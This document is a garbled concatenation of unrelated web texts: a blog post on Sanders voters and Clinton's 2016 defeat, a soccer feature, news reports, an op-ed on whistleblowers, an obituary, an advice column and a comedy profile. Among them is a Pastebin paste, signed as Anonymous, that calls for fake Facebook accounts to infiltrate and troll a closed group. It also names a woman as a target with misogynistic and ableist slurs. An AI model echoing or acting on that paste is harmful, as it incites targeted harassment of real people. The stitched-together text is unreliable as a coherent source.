In fact, this was true well before 2016. In the VOTER Survey, we know how Sanders-Trump voters voted in 2012, based on an earlier interview in November 2012. Only 35 percent of them reported voting for Obama, compared with 95 percent of Sanders-Clinton voters.
So yeh. A significant percentage of Sanders supporters are Independents, and it's shocking (SHOCKING!) that those Independents didn't vote like a loyal Democrat.
For Shame, Bernie Bros!
3) But only real fact you need to know about why Hillary lost is from this tweet.
Turns out it's not a Trump insurgency, but a Clinton collapse. A graph that cuts straight through today's punditry ... pic.twitter.com/x41cyyy2XI — Jonathan Webber (@jonathanwebber) November 9, 2016
You can cast all the blame you want, but the reason Trump won isn't because of who voted for him.
Trump won because of who DIDN'T vote for Hillary.
Finally, let's not forget this.
A 2010 study in Public Opinion Quarterly found that in the 2008 election 25 percent of those who voted for Clinton in the Democratic primary ended up voting for Republican John McCain, rather than Barack Obama, in the general election.
In related news, here is the 5-Step process of how a Democratic centrist smears a progressive.
Then I found this article that reminds me of Blairites.
Moderates are now scrambling to rebrand and reassert the “Clintonomics” that served them so well in the 1990s and into the Obama administration, including embracing global trade and collaborating with industry.
Worried that they have nobody with equal star power to Sanders or Warren, centrists are eagerly seeking out recruits in such places as a stealthy confab held in Aspen, Colo., this month by Third Way. But in a sign of the sensitivities, organizers promised not to name the nationally known politicians in attendance lest they face harassment from the left for showing up.
The group Priorities USA, which is packed with Hillary Clinton loyalists, has also plunged into the economic message debate armed with data from its focus groups of “persuadable” Trump voters in swing states. The effort is promoted as beneficial to Democrats of all varieties — and Priorities USA has no plans to get involved in primaries — but it also cautions candidates against banking too far left. Priorities Chairman Guy Cecil, citing the focus group findings, warned Democrats it would be a mistake to stress economic “fairness” over growth.
Oh yeah. That sounds like a grassroots meeting to me.
z3ro fucks with no luck a guest Oct 17th, 2013 1,540 Never a guest1,540Never
Not a member of Pastebin yet? Sign Up , it unlocks many cool features!
rawdownloadcloneembedreportprint text 1.35 KB Welcome to the interntet We ARE the internet The old school Anonymous. The balls out, no fucks given Anonymous. The chaos machine. It has come to our attention that the Chive community is ripe with douche bags and douchettes who seem to think they are untouchable. We are here to end that delusion. We want the streets of all things Chive to run red with interntet blood. The attacks are not going to be hacks, nor DDoS (because that's lame). What we desire is relentless trolling. Troll without mercy. Let the hate for dude bro's flow. There are plenty of them in the Chive communities. The first actual target is a Chive community on Facebook called "Chive on 'merica". Make fake Facebook accounts, more than one, try to join the group (it's a closed group), and once access is gained, show no mercy. Troll until you can troll no more. If you want an actual target, we suggest going after any and all posts by Angela Bean, a stupid little pill popping cunt with mental problems that would have anyone without tits locked away in a padded room for life. All other Chive groups are and will be targets at some point. This is just the intitial, pre attack, if you will. The proving grounds. Are you worthy? Prove it. We want to see what all you /b/tards are capable of. Bring back the hate machine. We are Anonymous We are legion to expect us you bloody cunts
RAW Paste Data
Welcome to the interntet We ARE the internet The old school Anonymous. The balls out, no fucks given Anonymous. The chaos machine. It has come to our attention that the Chive community is ripe with douche bags and douchettes who seem to think they are untouchable. We are here to end that delusion. We want the streets of all things Chive to run red with interntet blood. The attacks are not going to be hacks, nor DDoS (because that's lame). What we desire is relentless trolling. Troll without mercy. Let the hate for dude bro's flow. There are plenty of them in the Chive communities. The first actual target is a Chive community on Facebook called "Chive on 'merica". Make fake Facebook accounts, more than one, try to join the group (it's a closed group), and once access is gained, show no mercy. Troll until you can troll no more. If you want an actual target, we suggest going after any and all posts by Angela Bean, a stupid little pill popping cunt with mental problems that would have anyone without tits locked away in a padded room for life. All other Chive groups are and will be targets at some point. This is just the intitial, pre attack, if you will. The proving grounds. Are you worthy? Prove it. We want to see what all you /b/tards are capable of. Bring back the hate machine. We are Anonymous We are legion to expect us you bloody cunts
In the third in a series of posts on the future of soccer, Andrew Lewellen looks at the hotly debated role the college game plays in the U.S. soccer landscape. For Part I of the series, on the recent changes in high school and youth soccer, click here. For Part II, on the 1990 World Cup's impact on the U.S. soccer psyche, click here.
In the fifth round of the 2001 MLS Super Draft, the San Jose Earthquakes drafted Corey Woolfolk, a senior forward from Stanford University, a two-year captain who had led the team to the national championship game his sophomore year and finished his career at Stanford ranked top 10, all time, in all scoring categories. Woolfolk wasn't expecting to get drafted. He hadn't even been invited to the MLS combine. As he said, his “eyes were set on Europe,” where he wanted to play professionally. Being a fifth-round draft pick, his expectations weren't lofty: His goal was to make the Earthquakes' decision to cut him or keep him a hard one.
He succeeded in that mission. In the preseason, he played in seven of San Jose's nine games and finished as the team's leading scorer. Woolfolk played that preseason as an unprotected player; MLS players sign contracts with the league, and the league assigns them to teams. He didn't have a contract. Woolfolk didn't even earn a paycheck.
Roster deadline day approached. Woolfolk's agent told him he had a good chance of making the team. And he did. San Jose offered Woolfolk a contract. He signed it the night he got it.
The next morning, the Earthquakes' coach, Frank Yallop, called him into his office. Woolfolk remembers the conversation: “We're going to have to let you go,” Yallop told him him. Woolfolk asked him why. “It's not what you've done,” Yallop said. “You've made our job very difficult. But there's this player from Germany …”
That player from Germany was a 19-year-old kid named Landon Donovan.
Unlike Woolfolk, Landon Donovan hadn't gone to college. He hadn't even finished a “traditional” high school experience. He'd spent his last few years of high school in a residency program with the under-17 national team at the IMG Soccer Academy in Bradenton, Florida. Donovan was one of the first — and, in retrospect, probably the best — products of the U.S. Soccer Federation's Project 2010, a plan implemented by U.S. Soccer in 1998 with the goal, ostensibly, of creating a training environment that would enable a group of American players to become good enough to contend for the World Cup in 2010.
The report included two key initiatives: Project 40 (now called Generation Adidas), which would provide any player who had not graduated from college with an MLS contract, an education stipend, and specialized training opportunities (like a trip to Europe). The other initiative was the IMG Soccer Academy. Donovan was part of the academy's inaugural class, which also included DaMarcus Beasley, a star of the 2002 World Cup; and Oguchi Onyewu, a member of the 2006 and 2010 World Cup teams who now plays for Sporting in the Portugal Primeira Liga.
In the winter of 2001, Donovan was playing for Bayern Leverkusen, who had signed him in 1999 after he won the Golden Ball at the 1999 FIFA Youth World Championship. But Donovan wasn't getting on the field for Leverkusen's first team. He wanted to play, he wanted to play in the MLS, and he wanted to be in California, his home state.
When a league representative asked Yallop if he was interested in Donovan, he said yes. “It was exciting,” Yallop said. “I'd seen Landon play for the U17 team in Bradenton maybe two years before. He scored a hat trick in the game. Great finisher, lightning quick. What a time to get a player like that.”
When Woolfolk learned who Donovan was, what he'd already accomplished in his career, he realized there was “nothing much I could do.” San Jose cut Woolfolk and signed Donovan.
We all know what happened with Landon Donovan. As for Woolfolk: He never played an MLS game and never played in Europe. After the Earthquakes cut him, he signed with the Minnesota Thunder of United Soccer League-A, a minor league team. Injuries plagued him over the next few years, and he played for a few other minor league teams before retiring from competitive play in 2008. Always an excellent student — he'd graduated in the top 10 of his high school class — he went on to earn his MBA from Stanford and now works as an entrepreneur in the Bay Area.
“I may not have been as good a player as I thought I was. I remember watching Landon later that season, when he was [19]. He was amazing. Could I be a contributor, starting games? No. That was a better business decision” for San Jose.
The convergence of these two young men in San Jose in the spring of 2001 — and their different career trajectories — was a moment when the traditional model of American soccer player development intersected with the burgeoning new one.
College soccer had played a key role in that traditional model. In 1997, the year Woolfolk entered Stanford, virtually all American soccer players went to college. As he told me, kids going straight from college to the pros was unheard of. The MLS was only two years old at the time, and playing in Europe or South America was still a distant dream for American kids.
In most American sports, college athletics provide the best training environment for aspiring professional athletes. That's not the case with soccer. Competition for spots on professional soccer teams comes from all over the world. And in foreign countries, the best players don't go to college, they train in professional environments.
Woolfolk saw this firsthand. While a junior at Stanford, he studied abroad at the University of Glasgow in Scotland and trained with the reserve team of Rangers, a Scottish First Division club. He said at Rangers, guys who were “18 to 22 trained twice a day, everyday. Played games the entire season, August through May. They're playing 40 games that are meaningful.”
In contrast, the college soccer regular season runs for three months, from August through November. Conference tournaments are held in early November, and the NCAA tournament runs to the end of December. Teams play about 18 games, maybe as many as 25 if they make it to the national championship game. From the end of December through the beginning of August, due to NCAA regulations, college teams can only train and scrimmage other teams.
Many college players supplement this lack of training and competition in the offseason by playing for teams in the United Soccer League's Premier Development League (PDL), the top amateur league in the country. But playing for a new team under a new coach can be disruptive to their training regimens, and the PDL still doesn't provide a competitive environment comparable to those in foreign countries.
The former professional players I spoke with said they'd ideally like to see the NCAA make changes regarding soccer, like extending the season so that it runs from fall to spring, or developing partnerships with the PDL or MLS so players can more easily receive quality training year-round. But because soccer is rarely a revenue generator for college athletic departments, there's not much incentive for the NCAA to institute such changes.
In recent years, the MLS and U.S. Soccer have increased the opportunities for college-age players to train and play in professional environments, with initiatives such as Major League Soccer's Homegrown Players.
The issues with the college game and the new opportunities to train and play with professional teams has recently led many talented young soccer players to skip college. You can see this in the USMNT roster. On the ‘94 World Cup team, 17 of the 22 players attended college (all five who did not were born outside of the United States). On the USMNT's most recent roster, only nine of the 23 players went to college.
These recent changes have caused some analysts, including ESPN's Leander Schaerlaeckens, to say it's possible that college soccer could become an irrelevant training option for American players.
But former professional players disagree. While acknowledging the shortcomings of the college game, the players I spoke with — including Alexi Lalas, Tab Ramos, Taylor Twellman, and Kyle Martino — said college offers important benefits to players. The first of these is the opportunity for players to develop the personal characteristics that become essential elements of their success as professional athletes.
Kyle Martino, an analyst for NBC and the 2002 MLS Rookie of the Year, said he had the opportunity to play in the MLS after high school, but he wanted a college experience. He attended the University of Virginia for three years. He said that college helps a player become “a well-rounded person, that you have to discipline yourself, that you have schoolwork, and you don't have somebody following you around telling you what to do. A lot of [that] development helped me become a better teammate and professional.”
Alexi Lalas, an ESPN analyst and member of the '94 and '98 World Cups, said, “I think in our zeal to produce a better soccer player, we have failed to recognize the aspects to making a better soccer player that have nothing to do with kicking a ball. You have to be able to handle the 22 hours and 30 minutes that you're not on the field. When you talk about the college game you have to think about overall player development. I think it's benefited U.S. players.”
Martino also addressed the differences in maturity (an issue that Steve Kerr mentioned in his article on college basketball players) he saw between professional players who had gone to college and those who hadn't. “You could [tell] guys who skipped college in the way they held themselves. There was an insecurity and immaturity in a way they interacted with the rest of the team.”
Along with opportunities for essential personal growth, many feel college helps players develop as leaders and learn how to compete for a team.
Woolfolk said that in college, “players get to carry the mantle. They know what it means to be counted on. [They] feel the pressure of, ‘if I miss this penalty kick, we might not go on to the national semifinals.'”
Tab Ramos, the coach of the U20 national team, was drafted out of high school by the New York Cosmos in 1984. But he and his family decided he should go to college and get an education, “I valued my college experience,” he said. “It gives you a great opportunity to learn to compete. For players who haven't had an opportunity to compete for a national team, I think college is a place to learn to play for your colors.”
Ramos went on to be a member of the '90, '94, and '98 World Cup teams. He played professionally in Spain and the MLS, and was inducted into the National Soccer of Hall of Fame. But there's another important thing to remember about him: He, along with the other directors of U.S. Soccer — including youth technical director Claudio Reyna — received a college education. In the end, these are the men making crucial decisions about the direction of youth soccer in this country.
Andrew Lewellen (@AndyHLew), a former college soccer player and youth coach, is now a freelance writer based in Los Angeles. He writes about soccer on his blog, AndysPitch.com.
President Trump called Ireland's newly elected Prime Minister from the Oval Office to congratulate him on June 27, which reporters were invited to witness. Trump told Irish journalist, Caitríona Perry of RTÉ News, to come over to his desk and informed the prime minister that "she has a nice smile on her face. So, I bet she treats you well." (Reuters)
While President Trump spoke over the phone with Ireland's new prime minister Leo Varadkar Tuesday, congratulating him on his recent win, he made eye contact with a female reporter in the room.
“We have a lot of your Irish press watching us right now,” President Trump told Varadkar, informing him that the whole conversation was taking place in a room full of journalists with cameras running.
He pointed at Irish reporter Caitríona Perry, U.S. bureau chief for RTÉ News, telling her to come over to his desk.
“We have all of this beautiful Irish press,” Trump said to the prime minister, and asked Perry, “Where are you from?”
Perry approached Trump and introduced herself.
“She has a nice smile on her face so I bet she treats you well,” Trump said.
Perry, along with other men and women in the room, casually laughed at the encounter. But later, Perry described it as a “bizarre moment.”
Video of the bizarre moment when President @realDonaldTrump called me over during his call with Taoiseach @campaignforLeo Varadkar. @rtenews pic.twitter.com/TMl2SFQaji — Caitriona Perry (@CaitrionaPerry) June 27, 2017
Speaking on RTÉ after the exchange, Perry said she had not even expected to be allowed inside the White House to cover the president's phone call to Varadkar, who took office earlier this month as Ireland's Taoiseach, or prime minister. He is the son of an Indian immigrant and the country's first openly gay prime minister.
[Trump's proverb, Paul Ryan's ‘despicable' pint and other St. Patrick's Day mishaps]
“One minute we were outside the window and the next minute I'm meeting the President of the United States,” Perry told RTÉ.
“When we went in he was already on the phone but I managed to catch his eye and he called me over,” she said.
RTÉ's headline read: “Trump call! RTÉ's Caitríona has Presidential moment.”
During the phone call, Trump also said to Perry, “He thanks you for the newspapers, Caitríona.”
Caitríona Perry (RTE )
Varadkar was apparently referring to issues of The Washington Post and New York Times from the day after his victory in his party's leadership vote, Perry told the Irish Independent. Fine Gael is the political party that leads Ireland's government.
“I had sent those back to Dublin via colleagues for Leo Varadkar as souvenirs that he and his family might like,” Perry said. “I do that often when there is a reference to someone I know from home who is featured in the newspapers here,” she said.
Trump's unexpected decision to single out a female reporter drew mixed reactions on social media, with some describing it as “awkward” and others saying it was simply an attempt by Trump to share some “kind words.”
"She has a nice smile on her face so I bet she treats you well" Trump said creepily about the Irish reporter #Resist pic.twitter.com/USwpN7ZnTD — Scott Dworkin (@funder) June 28, 2017
Was it so bad Trump said the Irish lady reporter had "a nice smile on her face" ? She did, how's that just terrible & sexist? — Citizen Tammy #763 (@ToALouse) June 28, 2017
This is not the first time Trump has singled out a female reporter.
During the election, Trump faced backlash for saying Megyn Kelly, then a Fox News Channel anchor, “had blood coming out of her eyes, blood coming out of her wherever,” when she questioned him during a presidential debate.
“In my opinion, she was off base,” Trump added. (His campaign later claimed in a statement that Trump said “whatever” instead of “wherever,” and that the reference was to her nose.)
And few reporters on the campaign trail were criticized by the future president as much as NBC News's Katy Tur, as The Post's Paul Farhi reported:
His public lashings on Twitter and at rallies seemed to become obsessive, as if he were acting out a frustrated crush. He derided her as “Little Katy,” recommended that she be fired, called her “incompetent,” “dishonest,” a “3rd rate reporter.” His most frequent complaint: that she wasn't reporting the size of his campaign crowds (“Katy — you're not reporting it, Katy,” he bellowed at one point. “There's something happening, Katy.”)
More from Morning Mix:
Video: Bus slams into Englishman, who gets up and carries on
111 people have killed themselves under California's new right-to-die law
Appalachian wrestling's new villain calls himself ‘Progressive Liberal.' Hillary's on his shirt.
In a functioning democracy, it is absolutely crucial for power to be held to account. For this we need whistleblowers.
On January 17, 2017, whistleblower Chelsea Manning's 35-year prison sentence was commuted to seven years from her date of arrest, in one of President Obama's last acts before leaving office. At the time of her commutation, Private Manning had spent more time behind bars than any other person in US history who had disclosed information considered to be in the public interest.
The information leaked by Chelsea Manning – videos, diplomatic cables and reports relating to the Iraq War and the War in Afghanistan – exposed corruption and human rights abuses, and is widely regarded to have been a catalyst for the Arab Spring that began in December 2010.
During her imprisonment, Manning was forced to endure horrific treatment, including being held as a transgender woman in an all-male prison, being denied hormone therapy and surgery for her gender transition, being forced to sleep naked whilst on suicide watch, and spending more than a year in solitary confinement – treatment considered torture by the UN. She went on hunger strike, and attempted suicide twice.
Throughout this time, campaigning by civil and digital liberties groups such as Amnesty International, Demand Progress, Fight for the Future, the American Civil Liberties Union and the various political Pirate Parties around the world kept her plight in the public eye, and eventually secured her commutation. Regardless of whether you agree with Chelsea Manning's actions or her sentencing, she did not deserve to suffer the way that she did.
It's thanks to the courageous actions of whistleblowers that we know the truth about the extent of the Vietnam War (Daniel Ellsberg), the Watergate scandal (William Mark Felt, Sr., aka "Deep Throat"), National Security Agency spying (Edward Snowden), HSBC banking fraud (Nicholas Wilson, aka "Mr Ethical"), the Enron scandal (Sherron Watkins), WorldCom accounting fraud (Cynthia Cooper) and countless other high-level cover-ups. We take our knowledge of these incidents for granted, but without whistleblowers (often aided by a fearless and independent press), we would still be in the dark. A lack of digital privacy makes it that much more difficult for whistleblowers, journalists and activists to hold power to account.
In a functioning democracy, it is absolutely crucial for power to be held to account. For this we need whistleblowers – but their disclosures often put them in an extremely vulnerable position as governments and corporations seek to make an example of them, to discourage further revelations. They are disproportionately punished, and branded as traitors and criminals. When this happens, it falls to activist groups and the public to support them and pay them back in kind, by making sure the facts of their situation are uncovered and brought to light.
Another key component of a functioning democracy is the right to privacy – especially online privacy. Edward Snowden's revelations of NSA spying are just one example of the kind of intrusive, blanket surveillance that governments can enact if not kept in check. The Investigatory Powers Act that recently passed in the UK, and the bulk data collection and interception it authorises, is another.
More often than not, these intrusions are allowed through under the guise of "security" and "counter-terrorism"; we're persuaded that they're necessary. We're told that "if you have nothing to hide, then what are you afraid of?" But every citizen should have a basic right to keep their own affairs private. And a lack of digital privacy makes it that much more difficult for whistleblowers, journalists and activists to hold power to account by sharing and disclosing information in the public interest.
So whenever you can, make sure that you stand up for whistleblowers and the right to online privacy. We're going to need it now more than ever.
Mr. Sampas, who administered Jack Kerouac's estate, often retrieved items left at his brother-in-law's gravesite at Lowell's Edson Cemetery. In 2014, a memorial stone with a representation of the writer's signature on it was added.
As part of his many duties administering Jack Kerouac's estate, John Sampas spent time tending his famous brother-in-law's grave in Lowell's Edson Cemetery, retrieving what fans left to honor the author of “On the Road.”
He might come across an empty tobacco bag — “Jack smoked a pipe,” Mr. Sampas noted — or a trumpet mouthpiece that was an homage to Kerouac's love of jazz. One fan left a woman's shoe that had seen better days. “I'd say that's been on the road,” Mr. Sampas quipped.
He stored some of the items he retrieved in boxes he kept in the Lowell home where he grew up and lived much of his life. Now and then he chanced upon a loyal reader sitting alone, speaking aloud into eternity in the hope that Kerouac could hear. “They come to talk to Jack,” Mr. Sampas told the Globe in 2002 with a faint smile.
Advertisement
Mr. Sampas, whose stewardship of Kerouac's estate drew praise, occasional criticism, and court challenges as he guided numerous unpublished writings into print, died of cancer March 9 in his Greenwich, Conn., home. He was 84 and had lived in Lowell for many years, before moving last fall to reside closer to his son.
Get Fast Forward in your inbox: A look at the news and events shaping the day ahead, delivered every weekday. Sign Up Thank you for signing up! Sign up for more newsletters here
“John was very passionate, very smart,” said George Tobia, Mr. Sampas' lawyer and longtime friend. “He was always interested in any project that would further the legacy and he really became a historian about anything Jack ever did.”
Like Mr. Sampas, Kerouac grew up in Lowell. The writer was friends with Mr. Sampas' older siblings, including his sister Stella Sampas. In 1966, she became Kerouac's third wife, and his widow when he died in 1969 at age 47. Kerouac's mother, Gabrielle, died in 1973. When Stella died in 1990, she left her estate to her family, and Mr. Sampas was designated the executor, according to his son, John Shen-Sampas of Greenwich, Conn.
“He was afraid of the spotlight, but also willing to fight for Kerouac,” his son said. “On the professional level, he was extremely devoted to the Kerouac estate. All he wanted to do was to bring Kerouac to the world so everyone could read Kerouac.”
Two years ago, the University of Massachusetts Lowell recognized Mr. Sampas with an honorary degree. The university praised him for making more of Kerouac's work available to readers, and for contributing to the Lowell Celebrates Kerouac celebrations. Mr. Sampas also helped establish the Jack and Stella Kerouac Center and the John Sampas Endowed Scholarship Fund, according to the university.
Advertisement
In 2007, 50 years after “On the Road” was published, Mr. Sampas was called upon to accept the honorary doctorate that UMass Lowell awarded Kerouac.
With Mr. Sampas as executor, the estate published many previously unseen Kerouac manuscripts, including collections of his letters. Those volumes were a boon to scholars and a trove for ardent fans who wanted to know more about Kerouac's day-to-day life.
Some purist fans were less fond of other moves. Actor Johnny Depp reportedly paid $15,000 in the early 1990s for the writer's old raincoat, and Kerouac's image and words were licensed for advertising, notably in The Gap's “Kerouac wore khakis” campaign. In addition, the Lowell Spinners minor league baseball team has given away Kerouac bobblehead dolls.
In an interview that is posted on C-SPAN's website, Mr. Sampas mused about the challenges he faced while fielding requests involving his brother-in-law's writings and photos. “It's very difficult, because we don't want to seem commercial, but at the same time we have to manage an estate,” he said. “We have to pay fees to lawyers, to agents, so it's a very fine line.”
In that C-SPAN video, he focused on his principal motivation as executor: “Getting all these letters out and these books, the world will see what a genius Jack Kerouac is and was.”
Advertisement
John Sampas was born and grew up in Lowell, a son of Greek immigrants. His father, George, worked in different jobs, including at a mill and helping to run a bar. His mother, Maria, was a homemaker.
After graduating from Lowell High School, Mr. Sampas attended Marietta College in Ohio and Boston Conservatory, and left both before receiving a degree.
During the Korean War, he enlisted in the Air Force and was stationed in Kansas and Morocco, his son said.
After his stint in the military, Mr. Sampas worked in a government job in Washington, D.C., and at a mutual funds firm in Boston before returning to Lowell and entering the antiques business.
According to a tribute written by his son, Mr. Sampas' memories of Kerouac date back to childhood. He was 7 when a song he later would learn was being sung by Billie Holiday drew him to peek into his family's living room. Inside, Mr. Sampas' older brother Sebastian and Kerouac sat listening to the record. As the years progressed, the young Mr. Sampas avidly listened as his brother, Kerouac, and their friends discussed music and literature.
Mr. Sampas, his son said, “was always well-read, and books were his passion.”
Over the years, Mr. Sampas and the Kerouac estate were involved in court actions involving the will left by Kerouac's mother, Gabrielle, and the will left by Kerouac's widow, Stella. On the other side of the challenges were Jan Kerouac — the writer's only child, who died in 1996 — and Paul Blake Jr., a nephew of the writer.
Because Jack Kerouac died in Florida, the probate case was heard there, and a judge in 2009 declared that Gabrielle Kerouac's will was a forgery. The Sampas family, however, had inherited the Kerouac estate through the will of Stella, which was not contested. Mr. Sampas continued to administer the estate.
“He protected the estate and the legacy ferociously,” said Tobia, who along with representing Mr. Sampas and the Kerouac estate counts among his clients the literary estate of the late gonzo journalist Hunter S. Thompson. “He was really a steady guardian — as thorough and detailed as anyone I can imagine anyone in this job.”
In addition to his son, Mr. Sampas leaves his twin, Helen Surprenant of Dracut. A service will be announced.
For many years, the marker for Kerouac's grave in Edson Cemetery was a small, simple slab that was flush with the ground. In 2014, a 3,000-pound memorial stone was added. On it is a representation of the writer's signature and the inscription “The Road is Life” — a line from Kerouac's still-popular novel “On the Road.”
“I could have picked lots of things, but that was so succinct,” Mr. Sampas told the Globe at the time.
To those who knew Mr. Sampas, it's no surprise he paid such close attention to the words that appear on his brother-in-law's memorial stone.
“The image I would like to preserve of Jack is the image that Jack himself would like to preserve, and that is of a great American author,” Mr. Sampas said in the C-SPAN video. “He always aspired to be a writer. He always wanted to succeed at being a writer. He was pregnant with writing, and he succeeded.”
Bryan Marquard can be reached at bryan.marquard@globe.com
“Should I Move for The Guy I've Been Out With Four Times?”
New Here? Welcome! Dear Wendy is a relationship advice blog. You can read about me here, peruse the archives here and read popular posts here. You can also follow along on Facebook and Instagram. If you have a relationship/dating question I can help answer, you can send me your letters at [email protected] (be sure to read these guidelines first). Thanks for visiting!
I began communicating with my beau online over five months ago. “George” is black and I am white; I commonly refer to him as the black, male version of my best friend since childhood. We felt an immediate connection, even reminiscing about many childhood similarities. I have never experienced such a complete connection at the soul level. We are both divorced (he for ten years and I for almost two, but after a long process of counseling and healing before I filed) and in our mid-forties. It has been wonderful; we have had four dates, three of them meeting halfway between us (the third one was overnight) and once when I drove to him (2-½ hours) and he SPOILED me for my birthday! We communicate daily, via texts, phone calls, and video chats. We share photos of our children and their special events; he called me with a live video chat of his son's basketball game to include me, etc. We each have two children. The older two are in college, both 20; my younger child is about to graduate high school and his younger one is a busy, athletic sophomore. We have not met family/friends or children yet, because of crazy schedules, etc., but all are aware and, as George says, family is just “jacked up” anyway – it is true. In your 40s it's mostly about us vs. all the rest. I am completely self-sufficient financially though currently unemployed for about a year due to illness. I am still in a time of great transition and re-birth, but due to a large savings, residual income from my business, and counseling to heal from the abusive marriage, etc., I am actually the strongest/healthiest emotionally/mentally that I have been in a L O N G time, maybe ever. The connection is incredible, being together is so comfortable and easy, yet energizing and wonderful. We laugh much and at the same things (who knew?!?)! He is sensitive, supportive and encouraging, but also declaring his personal desires to be together long-term. I am already starting over and my soul feels incomplete without him in a real, physical way. I just moved from the family home into a condo, renovating it before I moved in to be much more saleable, should the need arise to sell quickly. I have NO debt, but I need to work soon or start to incur it. It feels futile to get settled here, my place is with him, period. Life is too short. Am I crazy to think of picking up and leaving my home after just moving in? On the one hand, people say you need to be “whole” before commitment. Yet, I am as “whole” as I have been in so many years in the important ways, knowing who I am. What I DO is not so important. I am smart, capable, and responsible. I finally believe it and so does he. — Feeling Whole
Are you crazy to think of picking up and leaving, for a man you've been on four dates with, a home you just moved into after leaving the home you shared with your abusive ex-husband? Yes. I think you might be a little bit crazy. And not in the woo-crazy-in-love way, either. I mean crazy in the you-sound-a-little-off-your-rocker kind of way. Like someone who's been in prison for many years and gets a taste of freedom and suddenly wants to do everything, all of it, right now, there's not a second to lose.
Did you read Monday's column? You should. The LW was another woman who felt strongly that she'd found her soulmate and had to immediately move to be with him. Spoiler alert: moving so quickly wasn't the best idea.
Look, it's great that you've met someone you can laugh with and whose company you enjoy, who SPOILS you when you drive hours to see him on your birthday (though, if he really wanted to spoil you, couldn't he have driven to you??). But that doesn't mean you should pick up and move to be with him. You don't really know the guy very well yet. Doesn't it bother you that he thinks family is “jacked up” and that's part of his reason for not introducing you to his? Do you really believe that, in one's 40s, it's really “us vs. all the rest”? Is that why you're in such a rush to hitch yourself to someone? Because you feel like everyone else has someone and you're only ever connected to the one person you're coupled-up with? That's so… it's just such a strange way of thinking. I'm in my 40s as are a lot of people I know, and I certainly don't think that it's my husband and I against everyone else. We depend on other people for a lot of things — good company, advice, child care help, and emotional support, to name a few. We count on others to feel less alone in our struggles as well as our joys. How lonely and isolating to think there's only one person who is meant to be your everything.
I think what's most confusing about your letter is that you claim to be so “whole,” while also in the midst of “great transition and re-birth.” Feeling “whole” is a description better used on the other side of a transition and re-birth, not in the midst of it. Indeed, it does sound like you are searching for your place in the world and how best to define yourself, and I can promise you that using a man to measure your worth is not the answer, especially on the heels of an abusive marriage. You say you are smart, capable, and responsible, and that you finally believe it and so does George. That's great. Then you should believe he's not going anywhere. You can take your time getting to know him and making sure you want the same thing before sacrificing the independence you've just tasted and the new life you've begun carving for yourself. If he doesn't wait, or if you fear he won't, then he's really not such a match for you after all.
***************
Follow along on Facebook, and Instagram.
If you have a relationship/dating question I can help answer, you can send me your letters at [email protected].
A Richmond police officer who shot and killed a suspect at a liquor store was identified Friday as K-9 Officer Wallace Jensen, a trained crisis negotiator.
Jensen shot a "very intoxicated" Richard Perez, 24, at Uncle Sam's Liquors near Cutting and Carlson boulevards shortly after midnight Sunday when Perez grappled with the officer and grabbed at his gun, said Richmond police Capt. Mark Gagan.
But John Burris, an attorney for Perez's family, said his investigation "indicates that Mr. Perez, who was unarmed when shot by the officer, did not at any time attempt to take the officer's gun. The officer's claim is disputed by various witnesses."
The family plans to hold a noon rally Saturday at Nicholl Park in Richmond.
In a posting on the Richmond police Facebook page, Perez's aunt, Rhonda Reeder Perez, said her nephew was "a kind, loving and generous man. He was not dangerous, he was scared!"
Jensen had been conducting a security check at the liquor store, which has been the source of numerous police calls for service and had been temporarily closed last year for alcohol-related violations, Gagan said.
In 2009, Jensen and another officer fired their guns at a suspect in a crime spree but missed, police said.
The incident is the first fatal officer-involved shooting in Richmond since 2007, when police shot and killed an 18-year-old man near Sixth Street and Nevin Avenue after the suspect chased and shot at another man, police said.
Some US presidents could have been disappointed that the US Navy Seals did not get back the marijuana reportedly growing in Osama bin Laden's compound in Abbottabad. But for most others, Operation Geronimo was a success. And one of the things that Bin Laden's death sparked off was a surfeit of Bin Laden jokes.
One of these jokes was a meme that appeared on many internet forums. A meme, broadly speaking, is authentic material parodied and passed around for entertainment. This particular meme involved the now-historic image of Barack Obama and team following Operation Geronimo from the Situation Room of the White House. It was a set of ten versions of the image. Each had a character or quirk morphed into the room. One frame accommodated a character from the TV series Jersey Shore, The Situation, leading to the caption, ‘The Situation in the Situation Room.' One had a velociraptor watching the screen in rapt attention with the others. One more had everyone, including Obama, wearing a hat Princess Beatrice wore at the recent royal wedding in England. In another frame, everyone in the room is Obama.
I found the meme funny, some didn't. It set me thinking, not for the first time, what is funny? The answer to this question, one knows, is not easy. ‘Funny' can be defined in contradictory ways.
For instance, one of the big debates in the world of humour is over sex jokes. For some stand-up comedians, they are a sign of weakness. This lot believes anyone can get a laugh out of a sex joke. There are other comedians who have no qualms relying heavily on sex. If it makes people laugh, it is good, they say. To get a few answers to what the rules are and what ‘funny' is, according to pros, I attended a stand-up comedy show recently at Zenzi restaurant in Mumbai (‘show' because, to say ‘gig', you should either be a professional entertainer or not older than 21).
At one point in the show, a restless youngster with a rock musician persona strode on stage. His name was Varun Thakur. Pacing around the platform, speaking confidently, he started by taking digs at the Mumbai suburb of Andheri, where he lives, and the locality of Oshiwara, the home of struggling actors (he is one too). Oshiwara, he said, was the Kashmir of Mumbai. “Jogeshwari and Andheri both claim it is theirs.” He also called it a place where everyone called Café Coffee Day, Sissidi. At this Sissidi, struggling actors took shelter and waited for the big break to come through the door. They were in audition mode even while placing their orders. Thakur acted it out, sounding a bit like Shah Rukh Khan in an emotional scene, “Kuchh der pehele maine ek coffee order ki thhi (pause). Kya woh coffee abhi mujhe mil sakti hai?” (A little while ago, I had ordered coffee. Is it possible to get that coffee now?) And then, Thakur says, the struggler nurses the coffee till the cup grows fungus.
His acting skill and energy lift his jokes. The occupants of a cramped section of Zenzi, their hands around throats of green beer bottles, hoot. Thakur talks of rushing to a medical store for an emergency contraceptive kit. “It's called Unwanted 72. Such a harsh name,” he says. “Why not call it Honest Mistake 72? Or Why-I-Did-Not-Pull-Out-in-Time 72?” The talent that won him first prize at a Vir Das Hamateur Night some time ago is evident.
Thakur moves on to cricket, his passion apart from cinema. He says Munaf Patel's habit of running alongside the ball makes him look as if he is bartering with it. “Hey ball, don't go so fast, yaar,” he says, jogging on stage, talking to an imaginary ball at his foot. “Slow down man, I'll give you a hundred bucks.”
But his biggest idol, the man who he says changed his life, is Hrithik Roshan. “If I was gay, I would do Hrithik,” he says. “Imagine the foreplay.” He shows the audience a flexing thumb. They shake their heads and laugh.
A couple of days later, I ask Thakur for his take on sex jokes. Is it okay to do them? “It is, if you build a nice scene or story around it. That is what I attempted with my Hrithik routine. I was in seventh grade when I saw Kaho Naa Pyaar Hai. It blew my mind. In my set, I just took my childhood Hrithik fashion to another level.”
